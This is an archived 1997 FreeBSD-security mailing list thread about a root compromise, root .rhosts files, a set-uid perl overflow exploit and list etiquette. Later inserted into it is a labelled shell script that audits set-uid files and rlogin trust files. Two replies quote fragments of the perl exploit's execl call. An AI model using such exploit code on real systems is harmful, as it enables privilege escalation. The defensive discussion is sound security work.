From: yossman To: John Preisler cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <199707290231.VAA03478@argon.vapornet.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk i've just been looking and i haven't found any either. just to be cute i linked ~root/.rhosts to /dev/null. ;) yossman On Mon, 28 Jul 1997, John Preisler wrote: > > > I'm not convinced that FreeBSD installs a /root/.rhosts by default. > None of my boxes have it. > > -jrp > ------------------------------------------------------------------------ Yossarian Holmberg (yossman) yossman@canweb.net System Administrator, National Online http://www.canweb.net/~yossman/ my statements are my own, not my employer's -- i do not speak for them. '... and if i die, before i learn to speak .. can money pay for all the days i've lived awake but half asleep?' -- Primitive Radio Gods, "Standing Outside a Broken Phone Booth With Money In My Hand" From owner-freebsd-security Wed Jul 30 17:16:26 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA15224 for security-outgoing; Wed, 30 Jul 1997 17:16:26 -0700 (PDT) Received: from fly.HiWAAY.net (root@fly.HiWAAY.net [208.147.154.56]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA15100 for ; Wed, 30 Jul 1997 17:15:32 -0700 (PDT) Received: from nexgen.hiwaay.net by fly.HiWAAY.net; (8.8.6/1.1.8.2/21Sep95-1003PM) id SAA15166; Wed, 30 Jul 1997 18:44:58 -0500 (CDT) Received: from nexgen (localhost [127.0.0.1]) by nexgen.hiwaay.net (8.8.6/8.8.4) with ESMTP id SAA13216 for ; Wed, 30 Jul 1997 18:02:08 -0500 (CDT) Message-Id: <199707302302.SAA13216@nexgen.hiwaay.net> X-Mailer: exmh version 2.0zeta 7/24/97 To: freebsd-security@FreeBSD.ORG 
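An added example, written for this archive page and not posted by anyone on the list: a POSIX shell audit covering the two exposures the thread keeps circling. Adam Shostack and James Seng want unused set-uid binaries out of the default install (the set-uid perl that TheCa's exploit execs is exactly that class of target), and John Preisler and yossman went looking for a root .rhosts that rlogin would honour without a password. The ROOT argument, the function names and the "fake-suid" fixture in the test are this example's own inventions; run against / the script is read-only.

```shell
#!/bin/sh
# Added example (not from the FreeBSD base system or any list poster):
# audit a tree for set-uid/set-gid binaries and for rlogin trust files.
# ROOT (first argument, default "") lets the same functions run against
# a mounted disk image or a scratch tree instead of the live system.

# Print every set-uid or set-gid regular file under ROOT, one per line,
# sorted so two runs can be diffed: a new entry is a new exposure.
list_setuid() {
    root=${1:-/}
    find "$root" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# Inspect root's .rhosts and /etc/hosts.equiv. Entry format is "host [user]";
# a '+' in either field is a wildcard, so "+ +" admits every user on every
# host with no password. A symlink to /dev/null (yossman's trick) neutralises
# the file and is reported as ok. Returns 1 if any live trust file carries
# at least one entry, 0 otherwise.
audit_trust() {
    root=${1:-}
    bad=0
    for f in "$root/root/.rhosts" "$root/etc/hosts.equiv"; do
        if [ -L "$f" ] && [ "$(readlink "$f")" = /dev/null ]; then
            echo "ok: $f -> /dev/null"
            continue
        fi
        [ -f "$f" ] || continue
        # grep -c exits 1 on a zero count; "|| true" keeps the 0 it printed.
        n=$(grep -cvE '^[[:space:]]*(#|$)' "$f" || true)
        w=$(grep -cE '(^|[[:space:]])\+([[:space:]]|$)' "$f" || true)
        echo "$f: $n entries, $w wildcard"
        if [ "$n" -gt 0 ]; then bad=1; fi
    done
    return $bad
}

# Both checks as one report; a non-zero exit means there is something to fix.
audit_report() {
    root=${1:-}
    echo "== set-uid/set-gid files under ${root:-/} =="
    list_setuid "$root"
    echo "== rlogin trust files =="
    audit_trust "$root"
}

# Usage: sh audit.sh /            (live system)
#        sh audit.sh /mnt/image   (a mounted image or chroot)
if [ $# -gt 0 ]; then
    audit_report "$1"
fi
```

Keep the first list_setuid output under version control and diff each later run; a set-uid file that was not there before is the thing to explain, whether it came from a port (sperl, which the port installs under /usr/local, not /usr/bin) or from an intruder. The trust-file check treats any entry at all in root's .rhosts as a finding, not just the "+ +" wildcard, because root should never have one.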
From: dkelly@HiWAAY.net Subject: Re: Commercial ssh and ssl (was Re: securelevel...) In-reply-to: Message from Robert Watson of "Wed, 30 Jul 1997 10:06:57 EDT." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 30 Jul 1997 18:02:08 -0500 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Robert Watson replied: > > On Tue, 29 Jul 1997 dkelly@hiwaay.net wrote: > > > I forgot, when does the relevant RSA patent expire? Maybe we can wait until > > then. :-) > > September, 2000. I wouldn't wait on this one. :) Oh, I don't know. The way some things are going (not going), 3 more years may be just about right. :-( -- David Kelly N4HHE, dkelly@hiwaay.net ===================================================================== The human mind ordinarily operates at only ten percent of its capacity -- the rest is overhead for the operating system. From owner-freebsd-security Wed Jul 30 20:02:13 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id UAA26207 for security-outgoing; Wed, 30 Jul 1997 20:02:13 -0700 (PDT) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id UAA26177 for ; Wed, 30 Jul 1997 20:02:03 -0700 (PDT) Received: (from msmith@localhost) by genesis.atrad.adelaide.edu.au (8.8.5/8.7.3) id MAA25307; Thu, 31 Jul 1997 12:31:46 +0930 (CST)
From: Michael Smith Message-Id: <199707310301.MAA25307@genesis.atrad.adelaide.edu.au> Subject: Re: security hole in FreeBSD In-Reply-To: <3.0.2.32.19970730144402.006c5dd4@pop.videotron.ca> from Patrick Gilbert at "Jul 30, 97 02:44:02 pm" To: gilbertp@videotron.com (Patrick Gilbert) Date: Thu, 31 Jul 1997 12:31:46 +0930 (CST) Cc: security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL28 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Patrick Gilbert stands accused of saying: > > After a brief discussion with TheCa on Efnet, he dcc'd me his famous > exploit for a transcript of > his brief moment of fame on this discussion list. Oh, what a d00d. > execl("/usr/bin/sperl5.00403", > "/usr/bin/sperl5.00403", buf, NULL); > } This looks like a Linux exploit; there is no Perl5 in the FreeBSD tree, and if it were installed from the port/package it would be in /usr/local/bin. -- ]] Mike Smith, Software Engineer msmith@gsoft.com.au [[ ]] Genesis Software genesis@gsoft.com.au [[ ]] High-speed data acquisition and (GSM mobile) 0411-222-496 [[ ]] realtime instrument control. (ph) +61-8-8267-3493 [[ ]] Unix hardware collector. "Where are your PEZ?" 
The Tick [[ From owner-freebsd-security Wed Jul 30 21:12:11 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id VAA00431 for security-outgoing; Wed, 30 Jul 1997 21:12:11 -0700 (PDT) Received: from cwsys.cwent.com (66@cschuber.net.gov.bc.ca [142.31.240.113]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id VAA00393 for ; Wed, 30 Jul 1997 21:12:04 -0700 (PDT) Received: (from uucp@localhost) by cwsys.cwent.com (8.8.6/8.6.10) id VAA02443; Wed, 30 Jul 1997 21:10:52 -0700 (PDT) Message-Id: <199707310410.VAA02443@cwsys.cwent.com> Received: from localhost.cwent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwent.com, id smtpd002438; Thu Jul 31 04:10:46 1997 X-Mailer: exmh version 2.0gamma 1/27/96 Reply-to: cschuber@uumail.gov.bc.ca To: Vincent Poy cc: "Jordan K. Hubbard" , Marco Molteni , security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Wed, 30 Jul 1997 16:04:24 PDT." <14957.870303864@time.cdrom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 30 Jul 1997 21:10:46 -0700 
From: Cy Schubert Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk > > know everything and will need to learn from others. Unless everyone is > > Albert Einstein here. > > It's not what you know, it's how you learn. Be more willing to > investigate the obvious before you run to the mailing lists for help > and you'll go much further here, Vince. Lack of proper "invesigative > skills" is your biggest weakness, as I've amply seen while observing > you these last couple of years, and you won't hone this skill by > asking questions, you'll hone it by spending just a little extra time > on each problem before bringing up that email client. > > Jordan > Jordan makes a lot of sense here. About 25 years ago a Computing Science teacher of mine told me that people either get it or they don't. In her experience, all class marks could be plotted on an inverted bell curve: Many people would get 80-100% and many would get 0-30% while hardly anyone would get 31-79%. She didn't go on to explain why this was so, however Jordan's remarks are probably one of the reasons. During the years since hearing that remark, I've had to agree with that teacher (and Jordan) many times and this is one of those times. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 UNIX Support OV/VM: BCSC02(CSCHUBER) ITSD BITNET: CSCHUBER@BCSC02.BITNET Government of BC Internet: cschuber@uumail.gov.bc.ca cschuber@bcsc02.gov.bc.ca "Quit spooling around, JES do it." 
From owner-freebsd-security Wed Jul 30 22:03:53 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA03410 for security-outgoing; Wed, 30 Jul 1997 22:03:53 -0700 (PDT) Received: from cs.iastate.edu (cs.iastate.edu [129.186.3.1]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA03400 for ; Wed, 30 Jul 1997 22:03:37 -0700 (PDT) Received: from popeye.cs.iastate.edu (popeye.cs.iastate.edu [129.186.3.4]) by cs.iastate.edu (8.8.5/8.7.1) with ESMTP id UAA14376; Wed, 30 Jul 1997 20:54:59 -0500 (CDT) Received: from localhost (ghelmer@localhost) by popeye.cs.iastate.edu (8.8.5/8.7.1) with SMTP id UAA05785; Wed, 30 Jul 1997 20:54:59 -0500 (CDT) X-Authentication-Warning: popeye.cs.iastate.edu: ghelmer owned process doing -bs Date: Wed, 30 Jul 1997 20:54:58 -0500 (CDT) 
From: Guy Helmer To: Frank Seltzer cc: Adam Shostack , Shashi Joshi , molter@logic.it, vince@mail.MCESTATE.COM, security@FreeBSD.ORG, mario1@PrimeNet.Com Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Frank Seltzer wrote: > On Wed, 30 Jul 1997, Guy Helmer wrote: > > > A slightly older draft of the paper is at > > > > http://www.cs.iastate.edu/~ghelmer/freebsd-security.ps > > I get a 404 when trying to 'fetch' this. Apologies -- I forgot it was gzipped: http://www.cs.iastate.edu/~ghelmer/freebsd-security.ps.gz Guy Helmer, Computer Science Graduate Student - ghelmer@cs.iastate.edu Iowa State University http://www.cs.iastate.edu/~ghelmer From owner-freebsd-security Wed Jul 30 22:50:59 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA05762 for security-outgoing; Wed, 30 Jul 1997 22:50:59 -0700 (PDT) Received: from mtvernon1.accessus.net (root@mtvernon1.accessus.net [204.248.93.5]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA05745 for ; Wed, 30 Jul 1997 22:50:43 -0700 (PDT) Received: from localhost (johnnyu@localhost) by mtvernon1.accessus.net (8.8.5/8.7.3) with SMTP id AAA01987 for ; Thu, 31 Jul 1997 00:21:02 -0500 Date: Thu, 31 Jul 1997 00:21:02 -0500 (CDT) 
From: NoHackMe! To: security@freebsd.org Subject: It's time to end this thread. Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Dear subscribers, I am tired of this arrogant attitude that some of the more vocal members have towards Vince. I am a co-admin at Gaianet. As he has stated before we are remote and voluntary. So your rantings and ravings about how we should know this and that are pointless. Vince reached out for help, not out of some lack of initiative, but because this list is a resource and as such he was right in posting to it for help. Unfortunately, save a few posts, he was given more attitude and flames than help. As you should all know it is impossible to protect yourself from every type of hack, mainly because there are new ones appearing all the time. We subscribe to Bugtraq and try to keep up with the "exploit kiddies" but save that we aren't security experts as some of you tout yourselves to be. If this seems inflammatory, good. You can take your "rtfm" and "you should have investigated before posting" and stick it where the sun doesn't shine. In the future if you have nothing to offer aside from those snide "I know more than you, but you should read the manual or spend 10 days trying to figure out how it happened before posting to this list" don't even bother posting. John P.S. These are my opinions and mine alone.
From owner-freebsd-security Wed Jul 30 23:18:49 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id XAA07916 for security-outgoing; Wed, 30 Jul 1997 23:18:49 -0700 (PDT) Received: from acromail.ml.org (acroal.vip.best.com [206.86.222.181]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id XAA07897 for ; Wed, 30 Jul 1997 23:18:43 -0700 (PDT) Received: from localhost (kernel@localhost) by acromail.ml.org (8.8.6/8.8.5) with SMTP id XAA00672; Wed, 30 Jul 1997 23:18:59 -0700 (PDT) Date: Wed, 30 Jul 1997 23:18:59 -0700 (PDT) 
From: FreeBSD Technical Reader To: Ollivier Robert cc: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <19970728171633.10794@keltia.freenix.fr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Is it also possible to do this with a raw socket using a custom protocol? On Mon, 28 Jul 1997, Ollivier Robert wrote: > According to Vincent Poy: > > 1) User on mercury machine complained about perl5 not working which was > > perl5.003 since libmalloc lib it was linked to was missing. > > 2) I recompiled the perl5 port from the ports tree and it's perl5.00403 > > and it works. > > I don't think he used perl to hack root unless you kept old versions of > Perl4 and Perl5. The buffer overflows in Perl4 were plugged in May by > Werner. 5.003+ holes are fixed in 5.004 and later. > > > 6) We went to inetd.conf and shut off all daemons except telnetd and > > rebooted and user still can get onto the machine invisibly. > > That shows that he has used a spare port to hook a root shell on. In this > case, "netstat -a" or "lsof -i:TCP" will give you all connections, > including those on which a program is LISTENing to. That way you'll catch > any process left on a port. > > -- > Ollivier ROBERT -=- FreeBSD: There are no limits -=- roberto@keltia.freenix.fr > FreeBSD keltia.freenix.fr 3.0-CURRENT #23: Sun Jul 20 18:10:34 CEST 1997 >
From owner-freebsd-security Thu Jul 31 05:26:58 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id FAA03985 for security-outgoing; Thu, 31 Jul 1997 05:26:58 -0700 (PDT) Received: from logic.it (mod8.logic.it [195.120.151.24]) by hub.freebsd.org (8.8.5/8.8.5) with SMTP id FAA03884 for ; Thu, 31 Jul 1997 05:26:18 -0700 (PDT) Received: (qmail 627 invoked by uid 1000); 31 Jul 1997 12:25:08 -0000 Date: Thu, 31 Jul 1997 14:25:07 +0200 (MET DST)
From: Marco Molteni X-Sender: molter@dumbwinter.ecomotor.it To: security@freebsd.org cc: "\[Mario1-\]" , Jim Shankland , Poul-Henning Kamp , "Jordan K. Hubbard" , Nate Williams , Michael Smith , Gary Clark II , Vincent Poy Subject: Re: security hole in FreeBSD Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk I wrote: > No, everybody started to flame at him! because what I didn't understand was the general animosity towards Vincent. I got many replies, all were kind and all asserted the same opinion, which can be summarized by Nate's posting: > From: Nate Williams > To: Marco Molteni > Cc: Vincent Poy , security@freebsd.org, > "[Mario1-]" > Subject: Re: security hole in FreeBSD > > Ahh, but you assume that we haven't ever seen Vinny before. > Unfortunately, his behavior is 'typical', in that he wants us to do all > his research and work for him, rather than him spending the time to do > his own work. He also shows a complete lack of interest in finding out > solutions to his own problems. [..] Yes, exactly, I assumed all the people on the list didn't see Vincent before. Instead, it seems that *all* you met Vincent a long time ago! ;-) I think I simply misunderstood. Never mind! Marco From owner-freebsd-security Thu Jul 31 06:57:07 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id GAA10467 for security-outgoing; Thu, 31 Jul 1997 06:57:07 -0700 (PDT) Received: from shift-f1.com (shift-f1.com [205.160.29.37]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id GAA10462 for ; Thu, 31 Jul 1997 06:57:04 -0700 (PDT) Received: (from shashi@localhost) by shift-f1.com (8.8.5/8.8.5) id JAA02851; Thu, 31 Jul 1997 09:55:19 -0500 (EST) 
From: Shashi Joshi Message-Id: <199707311455.JAA02851@shift-f1.com> Subject: Stop this thread NOW unless you have anything for the group In-Reply-To: from Vincent Poy at "Jul 30, 97 08:28:47 am" To: vince@mail.MCESTATE.COM (Vincent Poy) Date: Thu, 31 Jul 1997 09:55:19 -0500 (EST) Cc: nate@mt.sri.com, molter@logic.it, security@FreeBSD.ORG, mario1@primenet.com X-Mailer: ELM [version 2.4ME+ PL31 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Hi all, I am including the complete mail here. Will someone please tell me the relevance of this on the mailing list? ANYONE responding to any mail should MAKE CERTAIN it pertains to the group, else please modify the "To: " and "Cc: " fields. It doesn't matter how long you have been a hacker or a sysadmin. It applies to all. That is the basic courtesy a sys-admin should have, right? Else how will you ever handle a mail-mischief? Shashi As Vincent Poy (you? ) said -> > From owner-freebsd-security@FreeBSD.ORG Wed Jul 30 12:02:08 1997 > Date: Wed, 30 Jul 1997 08:28:47 -0700 (PDT)
> From: Vincent Poy > To: Nate Williams > cc: Marco Molteni , security@FreeBSD.ORG, > "[Mario1-]" > Subject: Re: security hole in FreeBSD > In-Reply-To: <199707301506.JAA04746@rocky.mt.sri.com> > Message-ID: > Sender: owner-freebsd-security@FreeBSD.ORG > X-Loop: FreeBSD.org > Precedence: bulk > On Wed, 30 Jul 1997, Nate Williams wrote: > > =)> =)Ahh, but you assume that we haven't ever seen Vinny before. > =)> =)Unfortunately, his behavior is 'typical', in that he wants us to do all > =)> =)his research and work for him, rather than him spending the time to do > =)> =)his own work. He also shows a complete lack of interest in finding out > =)> =)solutions to his own problems. > =)> > =)> I have tried reading the docs and it sometimes fails so what would > =)> you do? > =) > =)What docs have you read? What books have you read? > > The docs that came with the product. As for books, I don't have > that much time to go through reading books because by the time I finish > reading it, it'll be too late. > > =)> Since when have you dealt with me too many times over the last 2 > =)> years, you have helped me exactly twice. > =) > =)Do you want me to drag out my archives and prove you wrong? > =) > =)> flaming. Most of the people here have more resources than I would which > =)> is $$$ since remember I don't get paid to do this sysadmin stuff > =) > =)*SO WHAT*. Do you think I get paid to answer you? Do you think I've > =)ever got paid to do any FreeBSD hacking? It's irrelevant. I'm not the > =)person who claims he can read 500 words/minute, and who needs no > =)sleep at night, and who also 'must have missed all 12 emails discussing > =)the same problem in the mailing lists, even though I do read the lists'. > > I know you don't get paid to answer me but no one pointed a gun to > your head and made you answer every question I ask. I never claimed I can > read 500 words a minute.
I did say I need no sleep at night but do > remember, I am still in school so FreeBSD isn't my only thing. And it > wouldn't be weird if I missed a whole thread since sometimes when the > owners are on vacation, the bbs machine which I have no control of crashes > and the mail backlogs on the machine I read the mailing list on crashes > too and not until 10 days later, will the machines be back up. And > when I resubscribe again which I did at least 10-20 times just this year > alone, I would miss out on parts of the discussion. > > =)You don't learn from anything *but* your own mistakes, and then don't > =)try to come up with solutions, but rely on someone else to provide them > =)for you. > > I know I wouldn't learn from anything but my own mistakes since if > certain things are not in the docs, I would need to ask. > > =)> and even > =)> for the router, you are there physically, I am not so I need to verify > =)> things before doing it as a precaution. I don't think you or anyone else > =)> here never asked for help from others before. > =) > =)That's because I and most of the other folks do their research *first*, > =)and then ask questions. You continue to whine and complain and show a > =)complete lack of interest in figuring out the solution, and would > =)rather have someone spoon-feed you the steps in an easy to do solution > > You're still forgetting the fact that when you are physically > there next to the router machine, it's a night and day difference in > figuring things out. But when it's like totally remote, then you do need > to verify things first instead of totally screwing it up. Besides, for > the serial card, I asked if I had the configuration settings correct and > you did post a configuration of yours which worked but when we tried it > didn't. And this problem was never covered in the docs.
Somehow for > whatever reason, the FreeBSD machine would not see the CSU/DSU unless > either it was power toggled on/off or we had to issue a few linkup > commands in the script. Sorry about that one since I wasn't physically > there so I thought it might have been my misconfiguration. > > =)Unfortunately, there ain't 'system administration for dummies', > =)because a sys-ad requires a broad-base of knowledge, and you with all > =)your supposed talents don't take the time to do a good job. > > I'm trying to do my best at it but the problem is there are only so > many hours per day and I can't just drop the entire project and go read > books and stuff when the book might not even cover it. > > =)One thing that my family has taught me is that you end up with better > =)jobs by going out of your way to do your current job well. By sitting > =)on your duff and relying on people to tell you what to do, you'll never > =)get ahead in life. I only wish you could understand this advice, and > =)actually apply it. > > I'll try but with this security incident, it's different because > all three of us went into panic since if we had access to the machine now, > we would be able to at least find things. I guess what I need to do is > find the time to start reading things but I don't know where to start > since things in the computer area become obsolete so fast these days > anyways.
> > > Cheers, > Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ > Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] > GaiaNet Corporation - M & C Estate / / / / | / | __] ] > Beverly Hills, California USA 90210 / / / / / |/ / | __] ] > HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] > > > -- Shashi Joshi From owner-freebsd-security Thu Jul 31 08:24:55 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id IAA15087 for security-outgoing; Thu, 31 Jul 1997 08:24:55 -0700 (PDT) Received: from grendel.IAEhv.nl (grendel.IAEhv.nl [194.151.72.15]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id IAA15051 for ; Thu, 31 Jul 1997 08:24:28 -0700 (PDT) Received: (from peter@localhost) by grendel.IAEhv.nl (8.8.5/8.8.5) id BAA00810; Thu, 31 Jul 1997 01:43:54 +0200 (CEST) Message-ID: <19970731014354.30839@grendel.IAEhv.nl> Date: Thu, 31 Jul 1997 01:43:54 +0200 
From: Peter Korsten To: security@FreeBSD.ORG Subject: Re: Keep UUCP (Was: Re: security hole in FreeBSD) References: <3.0.32.19970730223202.0070ef8c@student.anu.edu.au> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.67e In-Reply-To: ; from Jay D. Nelson on Wed, Jul 30, 1997 at 03:52:38PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Jay D. Nelson shared with us: > Sometimes I think we can be too "internet-centric" for our own > good. UUCP makes good security and economic sense. > > [lotsa points deleted] > > Make it an install option if you want, but leave it as a part of the > standard distribution. I can only agree with this. As long as queued SMTP isn't commonly used, keep UUCP. (And then there's the News thing, too.) I have a rather complicated mail setup, with filters that delete, refuse, save in a folder or resend mail to my UUCP node according to a set of rules. To do it without UUCP would be inconvenient, to put it mildly. For a non-connected host, who wants to use standard mailers like Mutt or Elm, there's no real alternative. - Peter From owner-freebsd-security Thu Jul 31 09:06:43 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA17441 for security-outgoing; Thu, 31 Jul 1997 09:06:43 -0700 (PDT) Received: from yoss.canweb.net (root@yoss.canweb.net [207.139.235.8]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA17434 for ; Thu, 31 Jul 1997 09:06:38 -0700 (PDT) Received: from localhost (yossman@localhost) by yoss.canweb.net (8.8.5/8.8.5) with SMTP id MAA11987; Thu, 31 Jul 1997 12:00:31 -0400 (EDT) Date: Thu, 31 Jul 1997 12:00:31 -0400 (EDT) 
From: yossman To: sthaug@nethelp.no cc: pechter@lakewood.com, adam@homeport.org, freebsd-security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: <4202.870208785@verdi.nethelp.no> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Tue, 29 Jul 1997 sthaug@nethelp.no wrote: > I like the FreeBSD distributions - but I would be much happier if there > was an easy way to make a system more secure. For instance a document > which told you: > > - These files are only necessary if you need functionality X (uucp is > an example here). If you don't need functionality X, they can be safely > removed. [...] i would be VERY happy if such a document was released and was reasonably complete. setting up a new unix machine takes me at least a week of futzing around with security-related issues before i'm satisfied it's ready to be used with some assurance it's not going to be easily broken. having such a document as an additional information source would be awesome. yossman ------------------------------------------------------------------------ Yossarian Holmberg (yossman) yossman@canweb.net System Administrator, National Online http://www.canweb.net/~yossman/ my statements are my own, not my employer's -- i do not speak for them. '... and if i die, before i learn to speak .. can money pay for all the days i've lived awake but half asleep?' 
-- Primitive Radio Gods, "Standing Outside a Broken Phone Booth With Money In My Hand" From owner-freebsd-security Thu Jul 31 09:23:56 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id JAA18176 for security-outgoing; Thu, 31 Jul 1997 09:23:56 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id JAA18171 for ; Thu, 31 Jul 1997 09:23:49 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id MAA27641; Thu, 31 Jul 1997 12:20:04 -0400 (EDT) 
From: Adam Shostack Message-Id: <199707311620.MAA27641@homeport.org> Subject: Re: security hole in FreeBSD In-Reply-To: <199707310301.MAA25307@genesis.atrad.adelaide.edu.au> from Michael Smith at "Jul 31, 97 12:31:46 pm" To: msmith@atrad.adelaide.edu.au (Michael Smith) Date: Thu, 31 Jul 1997 12:20:04 -0400 (EDT) Cc: gilbertp@videotron.com, security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Michael Smith wrote: | Patrick Gilbert stands accused of saying: | > | > After a brief discussion with TheCa on Efnet, he dcc'd me his famous | > exploit for a transcript of | > his brief moment of fame on this discussion list. | | Oh, what a d00d. | | > execl("/usr/bin/sperl5.00403", | > "/usr/bin/sperl5.00403", buf, NULL); | > } | | This looks like a Linux exploit; there is no Perl5 in the FreeBSD tree, and | if it were installed from the port/package it would be in /usr/local/bin. This looks to me like a PERL5.004 exploit, not a linux exploit. Its just that the egg is the linux egg, not the FreeBSD egg. The egg code (nicely commented!) can be found in Leshka Zakharoff's ppp or cron overflows. Adam -- "It is seldom that liberty of any kind is lost all at once." 
-Hume From owner-freebsd-security Thu Jul 31 10:59:56 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id KAA23263 for security-outgoing; Thu, 31 Jul 1997 10:59:56 -0700 (PDT) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id KAA23254 for ; Thu, 31 Jul 1997 10:59:52 -0700 (PDT) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.8.5/8.8.5) with UUCP id LAA17808; Thu, 31 Jul 1997 11:59:20 -0600 (MDT) Received: from localhost (marcs@localhost) by alive.znep.com (8.7.5/8.7.3) with SMTP id MAA27798; Thu, 31 Jul 1997 12:00:17 -0600 (MDT) Date: Thu, 31 Jul 1997 12:00:17 -0600 (MDT) From: Marc Slemko To: Shashi Joshi cc: security@FreeBSD.ORG Subject: Re: So, lets have a checklist compiled (was Re: Security hole) In-Reply-To: <199707301450.JAA25877@shift-f1.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Wed, 30 Jul 1997, Shashi Joshi wrote: > Now why would sendmail be in sbin when it is not purely a sysadmin tool > only? Because sbin is not for sysadmin tools. man hier Followups are probably best directed to chat. From owner-freebsd-security Thu Jul 31 11:30:06 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA24775 for security-outgoing; Thu, 31 Jul 1997 11:30:06 -0700 (PDT) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA24769 for ; Thu, 31 Jul 1997 11:30:04 -0700 (PDT) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.8.5/8.8.5) with UUCP id MAA19733 for security@FreeBSD.ORG; Thu, 31 Jul 1997 12:30:03 -0600 (MDT) Received: from localhost (marcs@localhost) by alive.znep.com (8.7.5/8.7.3) with SMTP id MAA27936 for ; Thu, 31 Jul 1997 12:24:06 -0600 (MDT) Date: Thu, 31 Jul 1997 12:24:06 -0600 (MDT) 
From: Marc Slemko To: security@FreeBSD.ORG Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk (no, it isn't particularly FreeBSD related but at least it is security...)
On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: > There IS one common hole I've seen apache and stronghold have, and that is
More accurately, there is a common hole you have seen people have with their installations.
